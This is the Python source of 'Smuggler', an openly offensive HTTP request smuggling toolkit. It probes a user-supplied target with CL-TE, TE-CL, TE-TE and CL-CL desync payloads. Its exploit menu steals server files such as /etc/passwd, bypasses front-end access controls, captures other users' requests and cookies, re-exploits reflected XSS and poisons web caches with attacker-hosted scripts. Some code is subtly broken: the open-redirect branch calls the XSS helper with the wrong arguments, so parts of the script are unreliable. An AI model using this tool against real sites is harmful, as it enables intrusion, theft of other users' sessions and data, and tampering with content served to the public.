Smuggler/smuggler.py

#!/usr/bin/env python3 
# -*- coding: utf-8 -*-"
"""
Smuggler (HTTP -Smuggling- Attack Toolkit) - 2020 - by psy (epsylon@riseup.net)

You should have received a copy of the GNU General Public License along
with PandeMaths; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
"""
import sys, socket, ssl

VERSION = "v0.1_beta"
RELEASE = "25_04_2020"
SOURCE1 = "https://code.03c8.net/epsylon/smuggler"
SOURCE2 = "https://github.com/epsylon/smuggler"
CONTACT = "epsylon@riseup.net - (https://03c8.net)"

try:
    import payloads.payloads # import payloads
except:
    print ("\n[Info] Try to run the tool with Python3.x.y... (ex: python3 smuggler.py) -> [EXITING!]\n")
    sys.exit()

VULNERABLE_LIST = []

def set_target():
    target = input("\n  + Enter DOMAIN/IP (ex: 'http(s)://www.target.com'): ").lower()
    if target.startswith("http://"):
        target = target.replace("http://","")
        port = 80
        SSL = False
    elif target.startswith("https://"):
        target = target.replace("https://","")
        port = 443
        SSL = True
    else:
        print("\n[Error] Target is invalid: '"+str(target)+"'\n")
        print("="*50)
        sys.exit()
    method = input("\n  + Enter HTTP Method (ex: POST): ").upper()
    if method == "GET" or method == "POST":
        pass
    else:
        print("\n[Error] Method is invalid: '"+str(method)+"'\n")
        print("="*50)
        sys.exit()
    path = input("\n  + Enter PATH (ex: '/'): ")
    if path == "":
        path = "/"
    return target, port, SSL, method, path

def detect(): # detect menu
    target, port, SSL, method, path = set_target() # set target
    print("\n"+"="*50 + "\n")
    print("[Info] Starting HTTP Smuggling detection ...")
    payloads_dsync = payloads.payloads.payloads # load payloads
    addr = (target, port)
    print("")
    for payload in payloads_dsync:
        attack_type = payload.split("#")[0]
        payload_type = payload.split("#")[1]
        print("="*50)
        print("Trying payload: ["+str(attack_type)+"]")
        print("="*50+"\n")
        payload = method+" "+path+" HTTP/1.1\r\nHost: "+target+"\r\n"+payload_type
        print("+ PAYLOAD:\n")
        print(payload)
        send_payload(attack_type, payload, addr, SSL) # send each payload
    show_results(target, port, method, path) # show final results

def send_payload(attack_type, payload, addr, SSL):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if SSL == True: # ssl
        ss = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
    try:
        if SSL == True: # ssl
            ss.connect(addr)
        else:
            s.connect(addr)
    except:
        print("-"*45)
        print("[Error] Generating socket... -> [PASSING!]")
        print("-"*45+"\n")
        s.close()
        if SSL == True: # ssl
            ss.close()
        return
    for i in range(1,20): # 20x tests
        if SSL == True: # ssl
            ss.send(payload.encode('utf-8'))
        else:
            s.send(payload.encode('utf-8'))
    datas=""
    while 1:
        if SSL == True: # ssl
            data = ss.recv(1024)
        else:
            data = s.recv(1024)
        if not data:        
            break
        datas += str(data.decode('utf-8'))
    print("\n+ REPLY:\n")
    print(str(datas))
    resp_c=0
    resp=""
    wait=False
    for line in datas.split('\n'):
        if line.startswith('HTTP/1.1 400 BAD_REQUEST') or line.startswith('HTTP/1.1 400 Bad Request') or line.startswith('HTTP/1.1 400 BAD REQUEST'):
            wait=True
        elif line.startswith('HTTP/1.0 400 BAD_REQUEST') or line.startswith('HTTP/1.0 400 Bad Request') or line.startswith('HTTP/1.0 400 BAD REQUEST'):
            wait=True
        elif line.startswith('HTTP/1.1 '):
            wait=False
            resp_c+=1
        if not wait:
            resp += line+'\n'
    print("-"*45)
    if resp_c > 0:
        print ("PAYLOAD: ["+str(attack_type)+"] is WORKING! ;-)")
        VULNERABLE_LIST.append(attack_type) # add attack type for results
    else:
        print ("PAYLOAD: ["+str(attack_type)+"] is NOT working...")
    print("-"*45+"\n")
    s.close()
    if SSL == True: # ssl
        ss.close()

def show_results(target, port, method, path):
    print("="*50)
    print("\n+ FINAL RESULTS: -HTTP Smuggling- Attack\n")
    print("-"*45+"\n")
    print("  - TARGET: "+str(target)+":"+str(port))
    print("  - Method: "+str(method))
    print("  - Path  : "+str(path))
    CLCL = False
    TETE = False
    TECL = False
    CLTE = False 
    if VULNERABLE_LIST: 
        print("\n  - STATUS: [ VULNERABLE !!! ]\n")
        for v in VULNERABLE_LIST: # resume vulnerable payloads found
            if v.startswith("CL-CL") and CLCL == False: # CL-CL
                print("    * [CL-CL]: [Front-end: Content Length] <-> [Back-end: Content Length]")
                CLCL = True
            elif v.startswith("TE-TE") and TETE == False: # TE-TE
                print("    * [TE-TE]: [Front-end: Transfer-Encoding] <-> [Back-end: Transfer-Encoding]")
                TETE = True
            elif v.startswith("TE-CL") and TECL == False: # TE-CL
                print("    * [TE-CL]: [Front-end: Transfer-Encoding] <-> [Back-end: Content Length]")
                TECL = True
            elif v.startswith("CL-TE") and CLTE == False: # CL-TE
                print("    * [CL-TE]: [Front-end: Content-Length] <-> [Back-end: Transfer-Encoding]")
                CLTE = True
            else:
                pass
    else:
        print("\n  - STATUS: [ NOT VULNERABLE ]")
    print("\n"+"="*50+"\n")

def exploit(): # exploit menu
    exploit = input("\n+ SELECT EXPLOIT:\n\n  (0) Steal files (ex: '/etc/passwd')\n  (1) Bypass Front-End Security Controls\n  (2) Reveal Front-End Rewriting\n  (3) Capture Users Requests\n  (4) Re-Exploit a XSS Reflected\n  (5) Turn into an Open-Redirect\n  (6) Web Cache Poisoning\n  (7) Web Cache Deception\n\n")
    if exploit == "0": # steal files
        exploit_steal()
    elif exploit == "1": # bypass front-end
        exploit_bypass()
    elif exploit == "2": # reveal front-edn rewriting
        exploit_reveal()
    elif exploit == "3": # capture users requests
        exploit_capture()
    elif exploit == "4": # re-exploit xss reflection
        exploit_xss()
    elif exploit == "5": # turn into open-redirect 'zombie'
        exploit_openredirect()
    elif exploit == "6": # webcache poisoning
        exploit_poison()
    elif exploit == "7": # webcache deception
        exploit_deception()
    else: # exit
        print ("[Info] Not any valid exploit selected... -> [EXITING!]\n")
        sys.exit()

def send_exploit(addr, SSL, exploit):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if SSL == True: # ssl
        ss = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
    try:
        if SSL == True: # ssl
            ss.connect(addr)
        else:
            s.connect(addr)
    except:
        print("\n"+"-"*45)
        print("[Error] Generating socket... -> [PASSING!]")
        print("-"*45+"\n")
        s.close()
        if SSL == True: # ssl
            ss.close()
        return
    if SSL == True: # ssl
        ss.send(exploit.encode('utf-8'))
    else:
        s.send(exploit.encode('utf-8'))
    datas=""
    while 1:
        if SSL == True: # ssl
            data = ss.recv(1024)
        else:
            data = s.recv(1024)
        if not data:
            break
        datas += str(data.decode('utf-8'))
    print("\n+ REPLY:\n")
    print(str(datas))

def exploit_bypass():
    print("\n"+"="*50 + "\n")
    print("[Info] Trying to Bypass Front-End Security Controls...")
    target, port, SSL, method, path = set_target() # set target
    addr = (target, port)
    restricted_path = input("\n  + Enter RESTRICTED ZONE (ex: '/admin'): ")
    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '50'): ")
    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except:
        content_length = 50
    if not content_length:
        content_length = 50
    exploits_dsync = payloads.payloads.exploits # load exploits
    for exp in exploits_dsync:
        if "EXPLOIT-1" in exp: # extract all exploit-1 (bypass front-end ACLs)
            if request_type == "TE-CL":
                if "TE-CL" in exp: # exploit 1 TE-CL
                    exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
            elif request_type == "CL-TE":
                if "CL-TE" in exp: # exploit 1 CL-TE
                    exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
            elif request_type == "TE-TE":
                if "TE-TE" in exp: # exploit 1 TE-TE
                    exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
            elif request_type == "CL-CL":
                if "CL-CL" in exp: # exploit 1 CL-CL
                    exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
            else: # send all!
                exploit = exp.split("#")[1]
                exploit = exploit.replace("$method", method)
                exploit = exploit.replace("$path", path)
                exploit = exploit.replace("$target", target)
                exploit = exploit.replace("$restricted_path", restricted_path)
                exploit = exploit.replace("$CL", str(content_length))
                print("\n"+"="*50+"\n")
                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
                print(str(exploit))
                send_exploit(addr, SSL, exploit) # send expoit

def exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL):
    exploit = exp.split("#")[1]
    exploit = exploit.replace("$method", method)
    exploit = exploit.replace("$path", path)
    exploit = exploit.replace("$target", target)
    exploit = exploit.replace("$restricted_path", restricted_path)
    exploit = exploit.replace("$CL", str(content_length))
    print("\n"+"="*50+"\n")
    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
    print(str(exploit))
    send_exploit(addr, SSL, exploit) # send expoit

def exploit_reveal():
    print("\n"+"="*50 + "\n")
    print("[Info] Trying to Reveal Front-End Rewriting...")
    target, port, SSL, method, path = set_target() # set target
    addr = (target, port)
    parameter = input("\n  + Enter PARAMETER reflected (ex: 'user'): ")
    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '130'): ")
    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except:
        content_length = 130
    if not content_length:
        content_length = 130
    exploits_dsync = payloads.payloads.exploits # load exploits
    for exp in exploits_dsync:
        if "EXPLOIT-2" in exp: # extract exploit-2 (reveal rewriting)
            if request_type == "TE-CL":
                if "TE-CL" in exp: # exploit 2 TE-CL
                    exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
            elif request_type == "CL-TE":
                if "CL-TE" in exp: # exploit 2 CL-TE
                    exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
            elif request_type == "TE-TE":
                if "TE-TE" in exp: # exploit 2 TE-TE
                    exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
            elif request_type == "CL-CL":
                if "CL-CL" in exp: # exploit 2 CL-CL
                    exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
            else: # send all!
                exploit = exp.split("#")[1]
                exploit = exploit.replace("$method", method)
                exploit = exploit.replace("$path", path)
                exploit = exploit.replace("$target", target)
                exploit = exploit.replace("$parameter", parameter)
                exploit = exploit.replace("$CL", str(content_length))
                print("\n"+"="*50+"\n")
                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
                print(str(exploit))
                send_exploit(addr, SSL, exploit) # send expoit

def exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL):
    exploit = exp.split("#")[1]
    exploit = exploit.replace("$method", method)
    exploit = exploit.replace("$path", path)
    exploit = exploit.replace("$target", target)
    exploit = exploit.replace("$parameter", parameter)
    exploit = exploit.replace("$CL", str(content_length))
    print("\n"+"="*50+"\n")
    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
    print(str(exploit))
    send_exploit(addr, SSL, exploit) # send expoit

def exploit_capture():
    print("\n"+"="*50 + "\n")
    print("[Info] Trying to Capture Users Requests (cookies, other sensitive data, etc)...")
    target, port, SSL, method, path = set_target() # set target
    addr = (target, port)
    parameters = input("\n  + Enter PARAMETERS (ex: 'csrf=SmsWiwIJ07Wg5oqX87FfUVkMThn9VzO0&postId=2&name=Admin&comment='): ")
    cookie    = input("\n  + Enter COOKIE (ex: 'session=BOe1lFDosZ9lk7NLUpWcG8mjiwbeNZAO'): ")
    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '130'): ")
    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except:
        content_length = 130
    if not content_length:
        content_length = 130
    exploits_dsync = payloads.payloads.exploits # load exploits
    for exp in exploits_dsync:
        if "EXPLOIT-3" in exp: # extract exploit-3 (capture users requests)
            if request_type == "TE-CL":
                if "TE-CL" in exp: # exploit 3 TE-CL
                    exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
            elif request_type == "CL-TE":
                if "CL-TE" in exp: # exploit 3 CL-TE
                    exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
            elif request_type == "TE-TE":
                if "TE-TE" in exp: # exploit 3 TE-TE
                    exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
            elif request_type == "CL-CL":
                if "CL-CL" in exp: # exploit 3 CL-CL
                    exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
            else: # send all!
                exploit = exp.split("#")[1]
                exploit = exploit.replace("$method", method)
                exploit = exploit.replace("$path", path)
                exploit = exploit.replace("$target", target)
                exploit = exploit.replace("$parameters", parameters)
                exploit = exploit.replace("$cookie", cookie)
                exploit = exploit.replace("$CL", str(content_length))
                print("\n"+"="*50+"\n")
                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
                print(str(exploit))
                send_exploit(addr, SSL, exploit) # send expoit

def exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL):
    exploit = exp.split("#")[1]
    exploit = exploit.replace("$method", method)
    exploit = exploit.replace("$path", path)
    exploit = exploit.replace("$target", target)
    exploit = exploit.replace("$parameters", parameters)
    exploit = exploit.replace("$cookie", cookie)
    exploit = exploit.replace("$CL", str(content_length))
    print("\n"+"="*50+"\n")
    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
    print(str(exploit))
    send_exploit(addr, SSL, exploit) # send expoit

def exploit_xss():
    print("\n"+"="*50 + "\n")
    print("[Info] Trying to Re-Exploit a XSS Reflected (found in HTTP Headers) into other's sessions (NOT USER INTERACTION REQUIRED!)...")
    target, port, SSL, method, path = set_target() # set target
    addr = (target, port)
    header = input("\n  + Enter VULNERABLE HEADER (ex: 'User-Agent'): ")
    xss    = input("\n  + Enter XSS Injection (ex: '<script>alert(1)</script>'): ")
    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except:
        content_length = 100
    if not content_length:
        content_length = 100
    exploits_dsync = payloads.payloads.exploits # load exploits
    for exp in exploits_dsync:
        if "EXPLOIT-4" in exp: # extract exploit-4 (re-exploit XSS)
            if request_type == "TE-CL":
                if "TE-CL" in exp: # exploit 4 TE-CL
                    exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
            elif request_type == "CL-TE":
                if "CL-TE" in exp: # exploit 4 CL-TE
                    exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
            elif request_type == "TE-TE":
                if "TE-TE" in exp: # exploit 4 TE-TE
                    exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
            elif request_type == "CL-CL":
                if "CL-CL" in exp: # exploit 4 CL-CL
                    exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
            else: # send all!
                exploit = exp.split("#")[1]
                exploit = exploit.replace("$method", method)
                exploit = exploit.replace("$path", path)
                exploit = exploit.replace("$target", target)
                exploit = exploit.replace("$header", header)
                exploit = exploit.replace("$xss", xss)
                exploit = exploit.replace("$CL", str(content_length))
                print("\n"+"="*50+"\n")
                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
                print(str(exploit))
                send_exploit(addr, SSL, exploit) # send expoit

def exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL):
    exploit = exp.split("#")[1]
    exploit = exploit.replace("$method", method)
    exploit = exploit.replace("$path", path)
    exploit = exploit.replace("$target", target)
    exploit = exploit.replace("$header", header)
    exploit = exploit.replace("$xss", xss)
    exploit = exploit.replace("$CL", str(content_length))
    print("\n"+"="*50+"\n")
    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
    print(str(exploit))
    send_exploit(addr, SSL, exploit) # send expoit

def exploit_openredirect():
    print("\n"+"="*50 + "\n")
    print("[Info] Trying to turn an on-site redirect into an Open-Redirect (ex: UFONet 'zombie')...")
    target, port, SSL, method, path = set_target() # set target
    addr = (target, port)
    location = input("\n  + Enter NEW LOCATION (ex: 'otherwebsite.com'): ")
    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except:
        content_length = 100
    if not content_length:
        content_length = 100
    exploits_dsync = payloads.payloads.exploits # load exploits
    for exp in exploits_dsync:
        if "EXPLOIT-5" in exp: # extract exploit-5 (open-redirect)
            if request_type == "TE-CL":
                if "TE-CL" in exp: # exploit 5 TE-CL
                    exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
            elif request_type == "CL-TE":
                if "CL-TE" in exp: # exploit 5 CL-TE
                    exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
            elif request_type == "TE-TE":
                if "TE-TE" in exp: # exploit 5 TE-TE
                    exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
            elif request_type == "CL-CL":
                if "CL-CL" in exp: # exploit 5 CL-CL
                    exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
            else: # send all!
                exploit = exp.split("#")[1]
                exploit = exploit.replace("$method", method)
                exploit = exploit.replace("$path", path)
                exploit = exploit.replace("$target", target)
                exploit = exploit.replace("$location", location)
                exploit = exploit.replace("$CL", str(content_length))
                print("\n"+"="*50+"\n")
                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
                print(str(exploit))
                send_exploit(addr, SSL, exploit) # send expoit

def exploit_openredirect_armed(exploit, method, path, target, location, content_length, exp, addr, SSL):
    exploit = exp.split("#")[1]
    exploit = exploit.replace("$method", method)
    exploit = exploit.replace("$path", path)
    exploit = exploit.replace("$target", target)
    exploit = exploit.replace("$location", location)
    exploit = exploit.replace("$CL", str(content_length))
    print("\n"+"="*50+"\n")
    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
    print(str(exploit))
    send_exploit(addr, SSL, exploit) # send expoit

def exploit_poison():
    print("\n"+"="*50 + "\n")
    print("[Info] Trying to perform web cache poisoning...")
    target, port, SSL, method, path = set_target() # set target
    addr = (target, port)
    location = input("\n  + Enter POISON DOMAIN/IP (ex: 'attacker-website.net'): ")
    script   = input("\n  + Enter POISON SOURCE (ex: '/static/defaced.js'): ")
    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except:
        content_length = 100
    if not content_length:
        content_length = 100
    exploits_dsync = payloads.payloads.exploits # load exploits
    for exp in exploits_dsync:
        if "EXPLOIT-6" in exp: # extract exploit-6 (web cache poison)
            if request_type == "TE-CL":
                if "TE-CL" in exp: # exploit 6 TE-CL
                    exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
            elif request_type == "CL-TE":
                if "CL-TE" in exp: # exploit 6 CL-TE
                    exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
            elif request_type == "TE-TE":
                if "TE-TE" in exp: # exploit 6 TE-TE
                    exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
            elif request_type == "CL-CL":
                if "CL-CL" in exp: # exploit 6 CL-CL
                    exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
            else: # send all!
                exploit = exp.split("#")[1]
                exploit = exploit.replace("$method", method)
                exploit = exploit.replace("$path", path)
                exploit = exploit.replace("$target", target)
                exploit = exploit.replace("$location", location)
                exploit = exploit.replace("$script", script)
                exploit = exploit.replace("$CL", str(content_length))
                print("\n"+"="*50+"\n")
                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
                print(str(exploit))
                send_exploit(addr, SSL, exploit) # send expoit

def exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL):
    exploit = exp.split("#")[1]
    exploit = exploit.replace("$method", method)
    exploit = exploit.replace("$path", path)
    exploit = exploit.replace("$target", target)
    exploit = exploit.replace("$location", location)
    exploit = exploit.replace("$script", script)
    exploit = exploit.replace("$CL", str(content_length))
    print("\n"+"="*50+"\n")
    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
    print(str(exploit))
    send_exploit(addr, SSL, exploit) # send expoit

def exploit_deception():
    print("\n"+"="*50 + "\n")
    print("[Info] Trying to perform web cache deception leaking...")
    target, port, SSL, method, path = set_target() # set target
    addr = (target, port)
    private = input("\n  + Enter RESTRICTED ZONE (ex: '/private/messages'): ")
    content_length  = input("\n  + Enter CONTENT-LENGTH (default: '100'): ")
    request_type    = input("\n  + Enter PAYLOAD MODE (ex: 'TE-CL') (default: 'ALL'): ")
    try:
        content_length = int(content_length)
    except:
        content_length = 100
    if not content_length:
        content_length = 100
    exploits_dsync = payloads.payloads.exploits # load exploits
    for exp in exploits_dsync:
        if "EXPLOIT-7" in exp: # extract exploit-7 (web cache deception)
            if request_type == "TE-CL":
                if "TE-CL" in exp: # exploit 7 TE-CL
                    exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
            elif request_type == "CL-TE":
                if "CL-TE" in exp: # exploit 7 CL-TE
                    exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
            elif request_type == "TE-TE":
                if "TE-TE" in exp: # exploit 7 TE-TE
                    exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
            elif request_type == "CL-CL":
                if "CL-CL" in exp: # exploit 7 CL-CL
                    exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
            else: # send all!
                exploit = exp.split("#")[1]
                exploit = exploit.replace("$method", method)
                exploit = exploit.replace("$path", path)
                exploit = exploit.replace("$target", target)
                exploit = exploit.replace("$private", private)
                exploit = exploit.replace("$CL", str(content_length))
                print("\n"+"="*50+"\n")
                print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
                print(str(exploit))
                send_exploit(addr, SSL, exploit) # send expoit

def exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL):
    exploit = exp.split("#")[1]
    exploit = exploit.replace("$method", method)
    exploit = exploit.replace("$path", path)
    exploit = exploit.replace("$target", target)
    exploit = exploit.replace("$private", private)
    exploit = exploit.replace("$CL", str(content_length))
    print("\n"+"="*50+"\n")
    print("+ PAYLOAD MODE: ["+str(exp.split("#")[0].split("_")[1])+"]\n")
    print(str(exploit))
    send_exploit(addr, SSL, exploit) # send expoit

def exploit_steal():
    print("\n"+"="*50 + "\n")
    print("[Info] Trying to steal files from server...")
    target, port, SSL, method, path = set_target() # set target
    addr = (target, port)
    files = input("\n  + Enter FILE (ex: '/etc/passwd'): ")
    exploits_dsync = payloads.payloads.exploits # load exploits
    for exp in exploits_dsync:
        if "EXPLOIT-0" in exp: # extract exploit-0 (steal files)
            exploit = exp.split("#")[1]
            exploit = exploit.replace("$method", method)
            exploit = exploit.replace("$path", path)
            exploit = exploit.replace("$target", target)
            exploit = exploit.replace("$files", files)
            content_length = len(files)+2 # p=len(files)
            exploit = exploit.replace("$CL", str(content_length))
            print("\n"+"="*50+"\n")
            print("+ PAYLOAD MODE: [CL-CL]\n")
            print(str(exploit))
            send_exploit(addr, SSL, exploit) # send expoit

def print_banner():
    print("\n"+"="*50)
    print(" ____  __  __ _   _  ____  ____ _     _____ ____  ")
    print("/ ___||  \/  | | | |/ ___|/ ___| |   | ____|  _ \ ")
    print("\___ \| |\/| | | | | |  _| |  _| |   |  _| | |_) |")
    print(" ___) | |  | | |_| | |_| | |_| | |___| |___|  _ < ")
    print("|____/|_|  |_|\___/ \____|\____|_____|_____|_| \_\ by psy")
    print('\n"HTTP -Smuggling- (DSYNC) Attacking Toolkit"')
    print("\n"+"-"*15+"\n")
    print(" * VERSION: ")
    print("   + "+VERSION+" - (rev:"+RELEASE+")")
    print("\n * SOURCES:")
    print("   + "+SOURCE1)
    print("   + "+SOURCE2)
    print("\n * CONTACT: ")
    print("   + "+CONTACT+"\n")
    print("-"*15+"\n")
    print("="*50)

# sub_init #
print_banner() # show banner
option = input("\n+ CHOOSE: (D)etect or (E)ploit: ").upper()
print("\n"+"="*50)
if option == "D": # detecting phase
    detect()
else: # trying to exploit
    exploit()